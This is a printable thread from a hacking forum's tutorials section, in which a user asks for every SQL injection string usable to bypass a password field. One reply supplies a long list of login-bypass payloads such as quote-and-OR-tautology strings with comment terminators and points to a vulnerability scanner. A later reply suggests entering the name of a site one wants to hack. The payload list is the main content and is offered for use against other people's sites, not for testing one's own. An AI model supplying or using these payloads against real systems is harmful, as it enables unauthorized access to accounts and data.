![]() |
|
sql injection - Printable Version +- Sinisterly (https://sinister.li) +-- Forum: Hacking (https://sinister.li/Forum-Hacking) +--- Forum: Tutorials (https://sinister.li/Forum-Tutorials) +--- Thread: sql injection (/Thread-sql-injection--35993) |
sql injection - smartjugal - 08-21-2011 in sql injection for password we use some string like 1'or'1'='1 " or 1=1-- but i want to know all of the strings that i can use. Can someone give me that? :8-s: RE: sql injection - mothered - 08-21-2011 Firstly, you need to establish whether a given site Is vulnerable to SQL Injection. The commands are useless If It's not. Have a look for a tool named "Acunetix", which tests for vulnerabilities. Here's some strings to try: Spoiler:
' or 0=0 -- ' or 0=0 --' ' or 0=0 # " or 0=0 -- " or 0=0 --' '" or 0=0 -- or 0=0 -- ' or 0=0 # " or 0=0 # or 0=0 # ' or 'x'='x " or "x"="x ') or ('x'='x " or 1=1-- or 1=1-- ' or a=a--' ' or a=a # ' or a=a-- ' or "a"="a ' or 'a'='a " or "a"="a ') or ('a'='a ") or ("a"="a hi" or "a"="a hi" or 1=1 -- hi' or 1=1 -- hi' or 'a'='a hi') or ('a'='a hi") or ("a"="a ' or 1=1-- " or 1=1-- or 1=1-- ' or 'a'='a " or "a"="a ') or ('a'='a RE: sql injection - smartjugal - 08-21-2011 how to work with this tool "Acunetix"? RE: sql injection - chipp - 08-22-2011 maybe you can enter the name of the site you want to hack and see if it's vulnerable or not... so it's like a scanner (haven't try it...) |